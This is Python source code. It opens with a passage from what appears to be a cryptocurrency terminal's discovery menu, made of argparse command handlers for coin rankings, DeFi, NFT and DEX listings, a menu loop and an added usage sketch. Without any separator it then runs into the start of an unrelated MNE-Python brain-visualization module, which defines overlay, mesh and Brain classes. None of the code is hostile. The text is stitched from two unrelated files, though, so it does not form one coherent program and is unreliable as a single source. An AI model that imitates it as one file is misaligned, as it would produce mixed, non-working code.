If you will use that flag you will additional column with urls", default=False, ) ns_parser = parse_known_args_and_warn( parser, other_args, EXPORT_ONLY_RAW_DATA_ALLOWED ) if ns_parser: pycoingecko_view.display_discover( category="most_visited", top=ns_parser.limit, sortby=ns_parser.sortby, descend=ns_parser.descend, links=ns_parser.urls, export=ns_parser.export, ) @try_except def call_cgsentiment(self, other_args): """Process sentiment command""" parser = argparse.ArgumentParser( prog="cgsentiment", add_help=False, formatter_class=argparse.ArgumentDefaultsHelpFormatter, description=""" Discover coins with positive sentiment. Use --limit parameter to display only N number of records, You can sort by Rank, Name, Price_BTC, Price_USD, using --sort parameter and also with --descend flag to sort descending. Flag --urls will display one additional column with all coingecko urls for listed coins. sentiment will display: Rank, Name, Price_BTC, Price_USD """, ) parser.add_argument( "-l", "--limit", dest="limit", type=check_positive, help="Number of records to display", default=15, ) parser.add_argument( "-s", "--sort", dest="sortby", type=str, help="Sort by given column. Default: rank", default="Rank", choices=pycoingecko_model.TRENDING_FILTERS, ) parser.add_argument( "--descend", action="store_false", help="Flag to sort in descending order (lowest first)", dest="descend", default=True, ) parser.add_argument( "-u", "--urls", dest="urls", action="store_true", help="Flag to show urls. If you will use that flag you will additional column with urls", default=False, ) ns_parser = parse_known_args_and_warn( parser, other_args, EXPORT_ONLY_RAW_DATA_ALLOWED ) if ns_parser: pycoingecko_view.display_discover( category="positive_sentiment", top=ns_parser.limit, sortby=ns_parser.sortby, descend=ns_parser.descend, links=ns_parser.urls, export=ns_parser.export, ) @try_except def call_cgyfarms(self, other_args): """Process yfarms command""" parser = argparse.ArgumentParser( prog="cgyfarms", add_help=False, formatter_class=argparse.ArgumentDefaultsHelpFormatter, description=""" Shows Top Yield Farming Pools by Value Locked. Yield farming, also referred to as liquidity mining, is a way to generate rewards with cryptocurrency holdings. In simple terms, it means locking up cryptocurrencies and getting rewards. You can display only N number of coins with --limit parameter. You can sort data by Rank, Name, Value_Locked, Return_Year with --sort parameter and also with --descend flag to sort descending. """, ) parser.add_argument( "-l", "--limit", dest="limit", type=check_positive, help="Number of records to display", default=15, ) parser.add_argument( "-s", "--sort", dest="sortby", type=str, help="Sort by given column. Default: Rank", default="Rank", choices=pycoingecko_model.YFARMS_FILTERS, ) parser.add_argument( "--descend", action="store_false", help="Flag to sort in descending order (lowest first)", dest="descend", default=True, ) ns_parser = parse_known_args_and_warn( parser, other_args, EXPORT_ONLY_RAW_DATA_ALLOWED ) if ns_parser: pycoingecko_view.display_yieldfarms( top=ns_parser.limit, sortby=ns_parser.sortby, descend=ns_parser.descend, export=ns_parser.export, ) @try_except def call_cgvolume(self, other_args): """Process volume command""" parser = argparse.ArgumentParser( prog="cgvolume", add_help=False, formatter_class=argparse.ArgumentDefaultsHelpFormatter, description="""Shows Top Coins by Trading Volume. You can display only N number of coins with --limit parameter. 
You can sort data by on of columns Rank, Name, Symbol, Price, Change_1h, Change_24h, Change_7d, Volume_24h, Market_Cap with --sort parameter and also with --descend flag to sort descending. Displays columns: Rank, Name, Symbol, Price, Change_1h, Change_24h, Change_7d, Volume_24h, Market_Cap""", ) parser.add_argument( "-l", "--limit", dest="limit", type=check_positive, help="Number of records to display", default=15, ) parser.add_argument( "-s", "--sort", dest="sortby", type=str, help="Sort by given column. Default: Rank", default="Rank", choices=pycoingecko_model.CAP_FILTERS, ) parser.add_argument( "--descend", action="store_false", help="Flag to sort in descending order (lowest first)", dest="descend", default=True, ) ns_parser = parse_known_args_and_warn( parser, other_args, EXPORT_ONLY_RAW_DATA_ALLOWED ) if ns_parser: pycoingecko_view.display_top_volume_coins( top=ns_parser.limit, sortby=ns_parser.sortby, descend=ns_parser.descend, export=ns_parser.export, ) @try_except def call_cgdefi(self, other_args): """Process defi command""" parser = argparse.ArgumentParser( prog="cgdefi", add_help=False, formatter_class=argparse.ArgumentDefaultsHelpFormatter, description="""Shows Top DeFi Coins by Market Capitalization DeFi or Decentralized Finance refers to financial services that are built on top of distributed networks with no central intermediaries. You can display only N number of coins with --limit parameter. You can sort data by Rank, Name, Symbol, Price, Change_1h, Change_24h, Change_7d, Volume 24h, Market Cap, Url with --sort and also with --descend flag to sort descending. Flag --urls will display urls""", ) parser.add_argument( "-l", "--limit", dest="limit", type=check_positive, help="Number of records to display", default=15, ) parser.add_argument( "-s", "--sort", dest="sortby", type=str, help="Sort by given column. Default: rank", default="Rank", choices=pycoingecko_model.CAP_FILTERS, ) parser.add_argument( "--descend", action="store_false", help="Flag to sort in descending order (lowest first)", dest="descend", default=True, ) parser.add_argument( "-u", "--urls", dest="urls", action="store_true", help="Flag to show urls", default=False, ) ns_parser = parse_known_args_and_warn( parser, other_args, EXPORT_ONLY_RAW_DATA_ALLOWED ) if ns_parser: pycoingecko_view.display_top_defi_coins( top=ns_parser.limit, sortby=ns_parser.sortby, descend=ns_parser.descend, links=ns_parser.urls, export=ns_parser.export, ) @try_except def call_cgdex(self, other_args): """Process dex command""" parser = argparse.ArgumentParser( prog="cgdex", add_help=False, formatter_class=argparse.ArgumentDefaultsHelpFormatter, description=""" Shows Top Decentralized Exchanges on CoinGecko by Trading Volume You can display only N number of coins with --limit parameter. You can sort data by Name, Rank, Volume_24h, Coins, Pairs, Visits, Most_Traded, Market_Share by volume with --sort and also with --descend flag to sort descending. Display columns: Name, Rank, Volume_24h, Coins, Pairs, Visits, Most_Traded, Market_Share""", ) parser.add_argument( "-l", "--limit", dest="limit", type=check_positive, help="Number of records to display", default=15, ) parser.add_argument( "-s", "--sort", dest="sortby", type=str, help="Sort by given column. 
Default: Rank", default="Rank", choices=pycoingecko_model.DEX_FILTERS, ) parser.add_argument( "--descend", action="store_false", help="Flag to sort in descending order (lowest first)", dest="descend", default=True, ) ns_parser = parse_known_args_and_warn( parser, other_args, EXPORT_ONLY_RAW_DATA_ALLOWED ) if ns_parser: pycoingecko_view.display_top_dex( top=ns_parser.limit, sortby=ns_parser.sortby, descend=ns_parser.descend, export=ns_parser.export, ) @try_except def call_cgnft(self, other_args): """Process nft command""" parser = argparse.ArgumentParser( prog="cgnft", add_help=False, formatter_class=argparse.ArgumentDefaultsHelpFormatter, description="""Shows Top NFT Coins by Market Capitalization NFT (Non-fungible Token) refers to digital assets with unique characteristics. Examples of NFT include crypto artwork, collectibles, game items, financial products, and more. You can display only N number of coins with --limit parameter. You can sort data by Rank, Name, Symbol, Price, Change_1d, Change_24h, Change_7d, Market_Cap with --sort and also with --descend flag to sort descending. Flag --urls will display urls Displays : Rank, Name, Symbol, Price, Change_1d, Change_24h, Change_7d, Market_Cap, Url""", ) parser.add_argument( "-l", "--limit", dest="limit", type=check_positive, help="Number of records to display", default=15, ) parser.add_argument( "-s", "--sort", dest="sortby", type=str, help="Sort by given column. Default: Rank", default="Rank", choices=pycoingecko_model.CAP_FILTERS, ) parser.add_argument( "--descend", action="store_false", help="Flag to sort in descending order (lowest first)", dest="descend", default=True, ) parser.add_argument( "-u", "--urls", dest="urls", action="store_true", help="Flag to show urls", default=False, ) ns_parser = parse_known_args_and_warn( parser, other_args, EXPORT_ONLY_RAW_DATA_ALLOWED ) if ns_parser: pycoingecko_view.display_top_nft( top=ns_parser.limit, sortby=ns_parser.sortby, descend=ns_parser.descend, export=ns_parser.export, links=ns_parser.urls, ) @try_except def call_cmctop(self, other_args): """Process cmctop command""" parser = argparse.ArgumentParser( prog="cmctop", add_help=False, formatter_class=argparse.ArgumentDefaultsHelpFormatter, description="This gets the top ranked coins from coinmarketcap.com", ) parser.add_argument( "-l", "--limit", default=15, dest="limit", help="Limit of records", type=check_positive, ) parser.add_argument( "-s", "--sort", dest="sortby", type=str, help="column to sort data by.", default="CMC_Rank", choices=coinmarketcap_model.FILTERS, ) parser.add_argument( "--descend", action="store_false", help="Flag to sort in descending order (lowest first)", dest="descend", default=True, ) ns_parser = parse_known_args_and_warn( parser, other_args, EXPORT_ONLY_RAW_DATA_ALLOWED ) if ns_parser: coinmarketcap_view.display_cmc_top_coins( top=ns_parser.limit, sortby=ns_parser.sortby, descend=ns_parser.descend, export=ns_parser.export, ) @try_except def call_cpsearch(self, other_args): """Process search command""" parser = argparse.ArgumentParser( add_help=False, formatter_class=argparse.ArgumentDefaultsHelpFormatter, prog="cpsearch", description="""Search over CoinPaprika API You can display only N number of results with --limit parameter. You can sort data by id, name , category --sort parameter and also with --descend flag to sort descending. To choose category in which you are searching for use --cat/-c parameter. 
            Available categories: currencies|exchanges|icos|people|tags|all
            Displays: id, name, category""",
        )
        parser.add_argument(
            "-q",
            "--query",
            help="phrase for search",
            dest="query",
            nargs="+",
            type=str,
            required="-h" not in other_args,
        )
        parser.add_argument(
            "-c",
            "--cat",
            help="Categories to search: currencies|exchanges|icos|people|tags|all. Default: all",
            dest="category",
            default="all",
            type=str,
            choices=coinpaprika_model.CATEGORIES,
        )
        parser.add_argument(
            "-l",
            "--limit",
            default=10,
            dest="limit",
            help="Limit of records",
            type=check_positive,
        )
        parser.add_argument(
            "-s",
            "--sort",
            dest="sortby",
            type=str,
            help="Sort by given column. Default: id",
            default="id",
            choices=coinpaprika_model.FILTERS,
        )
        parser.add_argument(
            "--descend",
            action="store_false",
            help="Flag to sort in descending order (lowest first)",
            dest="descend",
            default=True,
        )
        if other_args:
            if not other_args[0][0] == "-":
                other_args.insert(0, "-q")
        ns_parser = parse_known_args_and_warn(
            parser, other_args, EXPORT_ONLY_RAW_DATA_ALLOWED
        )
        if ns_parser:
            coinpaprika_view.display_search_results(
                top=ns_parser.limit,
                sortby=ns_parser.sortby,
                descend=ns_parser.descend,
                export=ns_parser.export,
                query=" ".join(ns_parser.query),
                category=ns_parser.category,
            )


def menu(queue: List[str] = None):
    """Discovery Menu"""
    disc_controller = DiscoveryController(queue=queue)
    an_input = "HELP_ME"

    while True:
        # There is a command in the queue
        if disc_controller.queue and len(disc_controller.queue) > 0:
            # If the command is quitting the menu we want to return in here
            if disc_controller.queue[0] in ("q", "..", "quit"):
                if len(disc_controller.queue) > 1:
                    return disc_controller.queue[1:]
                return []

            # Consume 1 element from the queue
            an_input = disc_controller.queue[0]
            disc_controller.queue = disc_controller.queue[1:]

            # Print the current location because this was an instruction and we want user to know what was the action
            if an_input and an_input.split(" ")[0] in disc_controller.CHOICES_COMMANDS:
                print(f"{get_flair()} /crypto/disc/ $ {an_input}")

        # Get input command from user
        else:
            # Display help menu when entering on this menu from a level above
            if an_input == "HELP_ME":
                disc_controller.print_help()

            # Get input from user using auto-completion
            if session and gtff.USE_PROMPT_TOOLKIT and disc_controller.completer:
                try:
                    an_input = session.prompt(
                        f"{get_flair()} /crypto/disc/ $ ",
                        completer=disc_controller.completer,
                        search_ignore_case=True,
                    )
                except KeyboardInterrupt:
                    # Exit in case of keyboard interrupt
                    an_input = "exit"
            # Get input from user without auto-completion
            else:
                an_input = input(f"{get_flair()} /crypto/disc/ $ ")

        try:
            # Process the input command
            disc_controller.queue = disc_controller.switch(an_input)

        except SystemExit:
            print(
                f"\nThe command '{an_input}' doesn't exist on the /crypto/disc menu.",
                end="",
            )
            similar_cmd = difflib.get_close_matches(
                an_input.split(" ")[0] if " " in an_input else an_input,
                disc_controller.CHOICES,
                n=1,
                cutoff=0.7,
            )
            if similar_cmd:
                if " " in an_input:
                    candidate_input = (
                        f"{similar_cmd[0]} {' '.join(an_input.split(' ')[1:])}"
                    )
                    if candidate_input == an_input:
                        an_input = ""
                        disc_controller.queue = []
                        print("\n")
                        continue
                    an_input = candidate_input
                else:
                    an_input = similar_cmd[0]
                print(f" Replacing by '{an_input}'.")
                disc_controller.queue.insert(0, an_input)
            else:
                print("\n")
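
# ---------------------------------------------------------------------------
# Illustrative usage sketch (editor's addition, not part of the upstream
# controller). The menu above is queue-driven: ``menu`` consumes any commands
# passed in ``queue`` before prompting interactively, dispatches each one
# through ``DiscoveryController.switch``, and returns whatever is left in the
# queue when the menu quits. The command strings below are examples only, and
# running them hits the CoinGecko API, so network access and a configured
# terminal environment are assumed.
if __name__ == "__main__":
    # Show the 5 top trending coins non-interactively, then quit this menu.
    leftover_queue = menu(queue=["cgtrending -l 5", "q"])
    print(leftover_queue)  # any commands not consumed are handed back to the caller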
# Authors: Alexandre Gramfort <alexandre.gramfort@inria.fr> # Eric Larson <larson.eric.d@gmail.com> # Oleh Kozynets <ok7mailbox@gmail.com> # Guillaume Favelier <guillaume.favelier@gmail.com> # jona-sassenhagen <jona.sassenhagen@gmail.com> # Joan Massich <mailsik@gmail.com> # # License: Simplified BSD import contextlib from functools import partial from io import BytesIO import os import os.path as op import time import copy import traceback import warnings import numpy as np from collections import OrderedDict from .colormap import calculate_lut from .surface import _Surface from .view import views_dicts, _lh_views_dict from .callback import (ShowView, TimeCallBack, SmartCallBack, UpdateLUT, UpdateColorbarScale) from ..utils import (_show_help_fig, _get_color_list, concatenate_images, _generate_default_filename, _save_ndarray_img, safe_event) from .._3d import (_process_clim, _handle_time, _check_views, _handle_sensor_types, _plot_sensors, _plot_forward) from ...defaults import _handle_default, DEFAULTS from ...fixes import _point_data, _cell_data from ..._freesurfer import (vertex_to_mni, read_talxfm, read_freesurfer_lut, _get_head_surface, _get_skull_surface) from ...io.pick import pick_types from ...io.meas_info import Info from ...surface import (mesh_edges, _mesh_borders, _marching_cubes, get_meg_helmet_surf) from ...source_space import SourceSpaces from ...transforms import (Transform, apply_trans, invert_transform, _get_trans, _get_transforms_to_coord_frame, _frame_to_str) from ...utils import (_check_option, logger, verbose, fill_doc, _validate_type, use_log_level, Bunch, _ReuseCycle, warn, deprecated, get_subjects_dir, _check_fname, _to_rgb) _ARROW_MOVE = 10 # degrees per press class _Overlay(object): def __init__(self, scalars, colormap, rng, opacity, name): self._scalars = scalars self._colormap = colormap assert rng is not None self._rng = rng self._opacity = opacity self._name = name def to_colors(self): from .._3d import _get_cmap from matplotlib.colors import Colormap, ListedColormap if isinstance(self._colormap, str): cmap = _get_cmap(self._colormap) elif isinstance(self._colormap, Colormap): cmap = self._colormap else: cmap = ListedColormap( self._colormap / 255., name=str(type(self._colormap))) logger.debug( f'Color mapping {repr(self._name)} with {cmap.name} ' f'colormap and range {self._rng}') rng = self._rng assert rng is not None scalars = _norm(self._scalars, rng) colors = cmap(scalars) if self._opacity is not None: colors[:, 3] *= self._opacity return colors def _norm(x, rng): if rng[0] == rng[1]: factor = 1 if rng[0] == 0 else 1e-6 * rng[0] else: factor = rng[1] - rng[0] return (x - rng[0]) / factor class _LayeredMesh(object): def __init__(self, renderer, vertices, triangles, normals): self._renderer = renderer self._vertices = vertices self._triangles = triangles self._normals = normals self._polydata = None self._actor = None self._is_mapped = False self._current_colors = None self._cached_colors = None self._overlays = OrderedDict() self._default_scalars = np.ones(vertices.shape) self._default_scalars_name = 'Data' def map(self): kwargs = { "color": None, "pickable": True, "rgba": True, } mesh_data = self._renderer.mesh( x=self._vertices[:, 0], y=self._vertices[:, 1], z=self._vertices[:, 2], triangles=self._triangles, normals=self._normals, scalars=self._default_scalars, **kwargs ) self._actor, self._polydata = mesh_data self._is_mapped = True def _compute_over(self, B, A): assert A.ndim == B.ndim == 2 assert A.shape[1] == B.shape[1] == 4 A_w = A[:, 3:] # * 1 
B_w = B[:, 3:] * (1 - A_w) C = A.copy() C[:, :3] *= A_w C[:, :3] += B[:, :3] * B_w C[:, 3:] += B_w C[:, :3] /= C[:, 3:] return np.clip(C, 0, 1, out=C) def _compose_overlays(self): B = cache = None for overlay in self._overlays.values(): A = overlay.to_colors() if B is None: B = A else: cache = B B = self._compute_over(cache, A) return B, cache def add_overlay(self, scalars, colormap, rng, opacity, name): overlay = _Overlay( scalars=scalars, colormap=colormap, rng=rng, opacity=opacity, name=name, ) self._overlays[name] = overlay colors = overlay.to_colors() if self._current_colors is None: self._current_colors = colors else: # save previous colors to cache self._cached_colors = self._current_colors self._current_colors = self._compute_over( self._cached_colors, colors) # apply the texture self._apply() def remove_overlay(self, names): to_update = False if not isinstance(names, list): names = [names] for name in names: if name in self._overlays: del self._overlays[name] to_update = True if to_update: self.update() def _apply(self): if self._current_colors is None or self._renderer is None: return self._renderer._set_mesh_scalars( mesh=self._polydata, scalars=self._current_colors, name=self._default_scalars_name, ) def update(self, colors=None): if colors is not None and self._cached_colors is not None: self._current_colors = self._compute_over( self._cached_colors, colors) else: self._current_colors, self._cached_colors = \ self._compose_overlays() self._apply() def _clean(self): mapper = self._actor.GetMapper() mapper.SetLookupTable(None) self._actor.SetMapper(None) self._actor = None self._polydata = None self._renderer = None def update_overlay(self, name, scalars=None, colormap=None, opacity=None, rng=None): overlay = self._overlays.get(name, None) if overlay is None: return if scalars is not None: overlay._scalars = scalars if colormap is not None: overlay._colormap = colormap if opacity is not None: overlay._opacity = opacity if rng is not None: overlay._rng = rng # partial update: use cache if possible if name == list(self._overlays.keys())[-1]: self.update(colors=overlay.to_colors()) else: # full update self.update() @fill_doc class Brain(object): """Class for visualizing a brain. .. warning:: The API for this class is not currently complete. We suggest using :meth:`mne.viz.plot_source_estimates` with the PyVista backend enabled to obtain a ``Brain`` instance. Parameters ---------- subject_id : str Subject name in Freesurfer subjects dir. hemi : str Hemisphere id (ie 'lh', 'rh', 'both', or 'split'). In the case of 'both', both hemispheres are shown in the same window. In the case of 'split' hemispheres are displayed side-by-side in different viewing panes. surf : str FreeSurfer surface mesh name (ie 'white', 'inflated', etc.). title : str Title for the window. cortex : str, list, dict Specifies how the cortical surface is rendered. Options: 1. The name of one of the preset cortex styles: ``'classic'`` (default), ``'high_contrast'``, ``'low_contrast'``, or ``'bone'``. 2. A single color-like argument to render the cortex as a single color, e.g. ``'red'`` or ``(0.1, 0.4, 1.)``. 3. A list of two color-like used to render binarized curvature values for gyral (first) and sulcal (second). regions, e.g., ``['red', 'blue']`` or ``[(1, 0, 0), (0, 0, 1)]``. 4. A dict containing keys ``'vmin', 'vmax', 'colormap'`` with values used to render the binarized curvature (where 0 is gyral, 1 is sulcal). .. versionchanged:: 0.24 Add support for non-string arguments. 
alpha : float in [0, 1] Alpha level to control opacity of the cortical surface. size : int | array-like, shape (2,) The size of the window, in pixels. can be one number to specify a square window, or a length-2 sequence to specify (width, height). background : tuple(int, int, int) The color definition of the background: (red, green, blue). foreground : matplotlib color Color of the foreground (will be used for colorbars and text). None (default) will use black or white depending on the value of ``background``. figure : list of Figure | None If None (default), a new window will be created with the appropriate views. subjects_dir : str | None If not None, this directory will be used as the subjects directory instead of the value set using the SUBJECTS_DIR environment variable. %(views)s offset : bool | str If True, shifts the right- or left-most x coordinate of the left and right surfaces, respectively, to be at zero. This is useful for viewing inflated surface where hemispheres typically overlap. Can be "auto" (default) use True with inflated surfaces and False otherwise (Default: 'auto'). Only used when ``hemi='both'``. .. versionchanged:: 0.23 Default changed to "auto". show_toolbar : bool If True, toolbars will be shown for each view. offscreen : bool If True, rendering will be done offscreen (not shown). Useful mostly for generating images or screenshots, but can be buggy. Use at your own risk. interaction : str Can be "trackball" (default) or "terrain", i.e. a turntable-style camera. units : str Can be 'm' or 'mm' (default). %(view_layout)s silhouette : dict | bool As a dict, it contains the ``color``, ``linewidth``, ``alpha`` opacity and ``decimate`` (level of decimation between 0 and 1 or None) of the brain's silhouette to display. If True, the default values are used and if False, no silhouette will be displayed. Defaults to False. theme : str | path-like Can be "auto" (default), "light", or "dark" or a path-like to a custom stylesheet. For Dark-Mode and automatic Dark-Mode-Detection, :mod:`qdarkstyle` respectively and `darkdetect <https://github.com/albertosottile/darkdetect>`__ is required. show : bool Display the window as soon as it is ready. Defaults to True. block : bool If True, start the Qt application event loop. Default to False. Attributes ---------- geo : dict A dictionary of PyVista surface objects for each hemisphere. overlays : dict The overlays. Notes ----- This table shows the capabilities of each Brain backend ("✓" for full support, and "-" for partial support): .. 
table:: :widths: auto +-------------------------------------+--------------+---------------+ | 3D function: | surfer.Brain | mne.viz.Brain | +=====================================+==============+===============+ | :meth:`add_annotation` | ✓ | ✓ | +-------------------------------------+--------------+---------------+ | :meth:`add_data` | ✓ | ✓ | +-------------------------------------+--------------+---------------+ | :meth:`add_dipole` | | ✓ | +-------------------------------------+--------------+---------------+ | :meth:`add_foci` | ✓ | ✓ | +-------------------------------------+--------------+---------------+ | :meth:`add_forward` | | ✓ | +-------------------------------------+--------------+---------------+ | :meth:`add_head` | | ✓ | +-------------------------------------+--------------+---------------+ | :meth:`add_label` | ✓ | ✓ | +-------------------------------------+--------------+---------------+ | :meth:`add_sensors` | | ✓ | +-------------------------------------+--------------+---------------+ | :meth:`add_skull` | | ✓ | +-------------------------------------+--------------+---------------+ | :meth:`add_text` | ✓ | ✓ | +-------------------------------------+--------------+---------------+ | :meth:`add_volume_labels` | | ✓ | +-------------------------------------+--------------+---------------+ | :meth:`close` | ✓ | ✓ | +-------------------------------------+--------------+---------------+ | data | ✓ | ✓ | +-------------------------------------+--------------+---------------+ | foci | ✓ | | +-------------------------------------+--------------+---------------+ | labels | ✓ | ✓ | +-------------------------------------+--------------+---------------+ | :meth:`remove_data` | | ✓ | +-------------------------------------+--------------+---------------+ | :meth:`remove_dipole` | | ✓ | +-------------------------------------+--------------+---------------+ | :meth:`remove_forward` | | ✓ | +-------------------------------------+--------------+---------------+ | :meth:`remove_head` | | ✓ | +-------------------------------------+--------------+---------------+ | :meth:`remove_labels` | ✓ | ✓ | +-------------------------------------+--------------+---------------+ | :meth:`remove_annotations` | - | ✓ | +-------------------------------------+--------------+---------------+ | :meth:`remove_sensors` | | ✓ | +-------------------------------------+--------------+---------------+ | :meth:`remove_skull` | | ✓ | +-------------------------------------+--------------+---------------+ | :meth:`remove_text` | | ✓ | +-------------------------------------+--------------+---------------+ | :meth:`remove_volume_labels` | | ✓ | +-------------------------------------+--------------+---------------+ | :meth:`save_image` | ✓ | ✓ | +-------------------------------------+--------------+---------------+ | :meth:`save_movie` | ✓ | ✓ | +-------------------------------------+--------------+---------------+ | :meth:`screenshot` | ✓ | ✓ | +-------------------------------------+--------------+---------------+ | :meth:`show_view` | ✓ | ✓ | +-------------------------------------+--------------+---------------+ | TimeViewer | ✓ | ✓ | +-------------------------------------+--------------+---------------+ | :meth:`get_picked_points` | | ✓ | +-------------------------------------+--------------+---------------+ | :meth:`add_data(volume) <add_data>` | | ✓ | +-------------------------------------+--------------+---------------+ | view_layout | | ✓ | +-------------------------------------+--------------+---------------+ | 
flatmaps | | ✓ | +-------------------------------------+--------------+---------------+ | vertex picking | | ✓ | +-------------------------------------+--------------+---------------+ | label picking | | ✓ | +-------------------------------------+--------------+---------------+ """ def __init__(self, subject_id, hemi='both', surf='pial', title=None, cortex="classic", alpha=1.0, size=800, background="black", foreground=None, figure=None, subjects_dir=None, views='auto', offset='auto', show_toolbar=False, offscreen=False, interaction='trackball', units='mm', view_layout='vertical', silhouette=False, theme='auto', show=True, block=False): from ..backends.renderer import backend, _get_renderer if hemi is None: hemi = 'vol' hemi = self._check_hemi(hemi, extras=('both', 'split', 'vol')) if hemi in ('both', 'split'): self._hemis = ('lh', 'rh') else: assert hemi in ('lh', 'rh', 'vol') self._hemis = (hemi, ) self._view_layout = _check_option('view_layout', view_layout, ('vertical', 'horizontal')) if figure is not None and not isinstance(figure, int): backend._check_3d_figure(figure) if title is None: self._title = subject_id else: self._title = title self._interaction = 'trackball' self._bg_color = _to_rgb(background, name='background') if foreground is None: foreground = 'w' if sum(self._bg_color) < 2 else 'k' self._fg_color = _to_rgb(foreground, name='foreground') del background, foreground views = _check_views(surf, views, hemi) col_dict = dict(lh=1, rh=1, both=1, split=2, vol=1) shape = (len(views), col_dict[hemi]) if self._view_layout == 'horizontal': shape = shape[::-1] self._subplot_shape = shape size = tuple(np.atleast_1d(size).round(0).astype(int).flat) if len(size) not in (1, 2): raise ValueError('"size" parameter must be an int or length-2 ' 'sequence of ints.') size = size if len(size) == 2 else size * 2 # 1-tuple to 2-tuple subjects_dir = get_subjects_dir(subjects_dir) self.theme = theme self.time_viewer = False self._block = block self._hemi = hemi self._units = units self._alpha = float(alpha) self._subject_id = subject_id self._subjects_dir = subjects_dir self._views = views self._times = None self._vertex_to_label_id = dict() self._annotation_labels = dict() self._labels = {'lh': list(), 'rh': list()} self._unnamed_label_id = 0 # can only grow self._annots = {'lh': list(), 'rh': list()} self._layered_meshes = dict() self._actors = dict() self._elevation_rng = [15, 165] # range of motion of camera on theta self._lut_locked = None self._cleaned = False # default values for silhouette self._silhouette = { 'color': self._bg_color, 'line_width': 2, 'alpha': alpha, 'decimate': 0.9, } _validate_type(silhouette, (dict, bool), 'silhouette') if isinstance(silhouette, dict): self._silhouette.update(silhouette) self.silhouette = True else: self.silhouette = silhouette self._scalar_bar = None # for now only one time label can be added # since it is the same for all figures self._time_label_added = False # array of data used by TimeViewer self._data = {} self.geo = {} self.set_time_interpolation('nearest') geo_kwargs = self._cortex_colormap(cortex) # evaluate at the midpoint of the used colormap val = -geo_kwargs['vmin'] / (geo_kwargs['vmax'] - geo_kwargs['vmin']) self._brain_color = geo_kwargs['colormap'](val) # load geometry for one or both hemispheres as necessary _validate_type(offset, (str, bool), 'offset') if isinstance(offset, str): _check_option('offset', offset, ('auto',), extra='when str') offset = (surf in ('inflated', 'flat')) offset = None if (not offset or hemi != 'both') else 0.0 
logger.debug(f'Hemi offset: {offset}') self._renderer = _get_renderer(name=self._title, size=size, bgcolor=self._bg_color, shape=shape, fig=figure) self._renderer._window_close_connect(self._clean) self._renderer._window_set_theme(theme) self.plotter = self._renderer.plotter self._setup_canonical_rotation() # plot hemis for h in ('lh', 'rh'): if h not in self._hemis: continue # don't make surface if not chosen # Initialize a Surface object as the geometry geo = _Surface(self._subject_id, h, surf, self._subjects_dir, offset, units=self._units, x_dir=self._rigid[0, :3]) # Load in the geometry and curvature geo.load_geometry() geo.load_curvature() self.geo[h] = geo for _, _, v in self._iter_views(h): if self._layered_meshes.get(h) is None: mesh = _LayeredMesh( renderer=self._renderer, vertices=self.geo[h].coords, triangles=self.geo[h].faces, normals=self.geo[h].nn, ) mesh.map() # send to GPU mesh.add_overlay( scalars=self.geo[h].bin_curv, colormap=geo_kwargs["colormap"], rng=[geo_kwargs["vmin"], geo_kwargs["vmax"]], opacity=alpha, name='curv', ) self._layered_meshes[h] = mesh # add metadata to the mesh for picking mesh._polydata._hemi = h else: actor = self._layered_meshes[h]._actor self._renderer.plotter.add_actor(actor, render=False) if self.silhouette: mesh = self._layered_meshes[h] self._renderer._silhouette( mesh=mesh._polydata, color=self._silhouette["color"], line_width=self._silhouette["line_width"], alpha=self._silhouette["alpha"], decimate=self._silhouette["decimate"], ) self._renderer.set_camera(update=False, reset_camera=False, **views_dicts[h][v]) self.interaction = interaction self._closed = False if show: self.show() # update the views once the geometry is all set for h in self._hemis: for ri, ci, v in self._iter_views(h): self.show_view(v, row=ri, col=ci, hemi=h) if surf == 'flat': self._renderer.set_interaction("rubber_band_2d") def _setup_canonical_rotation(self): from ...coreg import fit_matched_points, _trans_from_params self._rigid = np.eye(4) try: xfm = read_talxfm(self._subject_id, self._subjects_dir) except Exception: return # XYZ+origin + halfway pts_tal = np.concatenate([np.eye(4)[:, :3], np.eye(3) * 0.5]) pts_subj = apply_trans(invert_transform(xfm), pts_tal) # we fit with scaling enabled, but then discard it (we just need # the rigid-body components) params = fit_matched_points(pts_subj, pts_tal, scale=3, out='params') self._rigid[:] = _trans_from_params((True, True, False), params[:6]) def setup_time_viewer(self, time_viewer=True, show_traces=True): """Configure the time viewer parameters. Parameters ---------- time_viewer : bool If True, enable widgets interaction. Defaults to True. show_traces : bool If True, enable visualization of time traces. Defaults to True. Notes ----- The keyboard shortcuts are the following: '?': Display help window 'i': Toggle interface 's': Apply auto-scaling 'r': Restore original clim 'c': Clear all traces 'n': Shift the time forward by the playback speed 'b': Shift the time backward by the playback speed 'Space': Start/Pause playback 'Up': Decrease camera elevation angle 'Down': Increase camera elevation angle 'Left': Decrease camera azimuth angle 'Right': Increase camera azimuth angle """ from ..backends._utils import _qt_app_exec if self.time_viewer: return if not self._data: raise ValueError("No data to visualize. 
See ``add_data``.") self.time_viewer = time_viewer self.orientation = list(_lh_views_dict.keys()) self.default_smoothing_range = [-1, 15] # Default configuration self.playback = False self.visibility = False self.refresh_rate_ms = max(int(round(1000. / 60.)), 1) self.default_scaling_range = [0.2, 2.0] self.default_playback_speed_range = [0.01, 1] self.default_playback_speed_value = 0.01 self.default_status_bar_msg = "Press ? for help" self.default_label_extract_modes = { "stc": ["mean", "max"], "src": ["mean_flip", "pca_flip", "auto"], } self.default_trace_modes = ('vertex', 'label') self.annot = None self.label_extract_mode = None all_keys = ('lh', 'rh', 'vol') self.act_data_smooth = {key: (None, None) for key in all_keys} self.color_list = _get_color_list() # remove grey for better contrast on the brain self.color_list.remove("#7f7f7f") self.color_cycle = _ReuseCycle(self.color_list) self.mpl_canvas = None self.help_canvas = None self.rms = None self.picked_patches = {key: list() for key in all_keys} self.picked_points = {key: list() for key in all_keys} self.pick_table = dict() self._spheres = list() self._mouse_no_mvt = -1 self.callbacks = dict() self.widgets = dict() self.keys = ('fmin', 'fmid', 'fmax') # Derived parameters: self.playback_speed = self.default_playback_speed_value _validate_type(show_traces, (bool, str, 'numeric'), 'show_traces') self.interactor_fraction = 0.25 if isinstance(show_traces, str): self.show_traces = True self.separate_canvas = False self.traces_mode = 'vertex' if show_traces == 'separate': self.separate_canvas = True elif show_traces == 'label': self.traces_mode = 'label' else: assert show_traces == 'vertex' # guaranteed above else: if isinstance(show_traces, bool): self.show_traces = show_traces else: show_traces = float(show_traces) if not 0 < show_traces < 1: raise ValueError( 'show traces, if numeric, must be between 0 and 1, ' f'got {show_traces}') self.show_traces = True self.interactor_fraction = show_traces self.traces_mode = 'vertex' self.separate_canvas = False del show_traces self._configure_time_label() self._configure_scalar_bar() self._configure_shortcuts() self._configure_picking() self._configure_tool_bar() self._configure_dock() 